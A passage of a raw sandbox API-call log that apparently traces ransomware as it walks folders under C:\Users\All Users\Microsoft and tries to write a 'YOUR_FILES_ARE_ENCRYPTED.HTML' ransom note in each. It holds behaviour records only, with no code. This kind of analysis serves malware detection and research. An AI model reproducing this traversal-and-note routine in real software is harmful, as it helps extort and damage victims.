ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf86849f, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf86e63f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c470, dwReserved1=0x63c418, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.428] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0110.429] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0110.429] GetProcessHeap () returned 0x600000 [0110.429] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msscan\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.429] GetProcessHeap () returned 0x600000 [0110.429] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.429] GetProcessHeap () returned 0x600000 [0110.429] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.429] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf8733f3, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf8733f3, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf87827c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.429] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf8733f3, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf8733f3, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf87827c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.430] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0110.430] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0110.430] GetProcessHeap () returned 0x600000 [0110.430] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.430] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.430] GetProcessHeap () returned 0x600000 [0110.430] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.430] GetProcessHeap () returned 0x600000 [0110.430] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.431] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="WinMSIPC", cAlternateFileName="")) returned 1 [0110.431] StrStrIW (lpFirst="WinMSIPC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.431] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WinMSIPC") returned 41 [0110.431] GetProcessHeap () returned 0x600000 [0110.431] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.432] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\WinMSIPC" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WinMSIPC") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\WinMSIPC" [0110.432] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WinMSIPC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WinMSIPC\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\WinMSIPC\\*" [0110.432] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WinMSIPC\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf8a1a24, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0110.432] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf8a1a24, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.432] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="Server", cAlternateFileName="")) returned 1 [0110.433] StrStrIW (lpFirst="Server", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.433] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server") returned 48 [0110.433] GetProcessHeap () returned 0x600000 [0110.433] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.433] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server" [0110.433] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\*" [0110.433] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf888049, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306dc, dwReserved1=0x630688, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.433] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf888049, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306dc, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 1 [0110.433] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf888049, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf888049, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf88d2de, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6306dc, dwReserved1=0x630688, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.433] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf888049, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf888049, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf88d2de, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6306dc, dwReserved1=0x630688, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.434] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.434] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 78 [0110.434] GetProcessHeap () returned 0x600000 [0110.434] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.434] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\winmsipc\\server\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.434] GetProcessHeap () returned 0x600000 [0110.434] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.434] GetProcessHeap () returned 0x600000 [0110.434] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.434] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf8a1a24, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf8a1a24, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf8a6d94, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.435] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf8a1a24, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf8a1a24, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf8a6d94, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.435] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0110.435] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WinMSIPC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 71 [0110.435] GetProcessHeap () returned 0x600000 [0110.435] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.435] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WinMSIPC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\winmsipc\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.435] GetProcessHeap () returned 0x600000 [0110.435] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.435] GetProcessHeap () returned 0x600000 [0110.435] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.436] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="WwanSvc", cAlternateFileName="")) returned 1 [0110.436] StrStrIW (lpFirst="WwanSvc", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.436] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc") returned 40 [0110.436] GetProcessHeap () returned 0x600000 [0110.436] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.437] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc" [0110.437] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\*" [0110.438] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf8c51e1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.438] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf8c51e1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.438] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="DMProfiles", cAlternateFileName="DMPROF~1")) returned 1 [0110.438] StrStrIW (lpFirst="DMProfiles", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.438] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles") returned 51 [0110.438] GetProcessHeap () returned 0x600000 [0110.438] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.438] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles" [0110.438] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\*" [0110.439] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306da, dwReserved1=0x630688, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.439] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306da, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 1 [0110.439] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306da, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 0 [0110.439] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.439] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0110.439] GetProcessHeap () returned 0x600000 [0110.439] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.439] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.439] GetProcessHeap () returned 0x600000 [0110.439] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.439] GetProcessHeap () returned 0x600000 [0110.439] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.440] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="Profiles", cAlternateFileName="")) returned 1 [0110.440] StrStrIW (lpFirst="Profiles", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.440] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles") returned 49 [0110.440] GetProcessHeap () returned 0x600000 [0110.440] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.441] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles" [0110.441] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*" [0110.441] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306da, dwReserved1=0x630688, cFileName=".", cAlternateFileName="")) returned 0x626738 [0110.441] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306da, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 1 [0110.441] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306da, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 0 [0110.441] FindClose (in: hFindFile=0x626738 | out: hFindFile=0x626738) returned 1 [0110.441] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 79 [0110.441] GetProcessHeap () returned 0x600000 [0110.441] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.441] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\profiles\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.441] GetProcessHeap () returned 0x600000 [0110.441] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.441] GetProcessHeap () returned 0x600000 [0110.441] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.442] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf8c51e1, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf8c51e1, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf8ca0b6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.442] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf8c51e1, 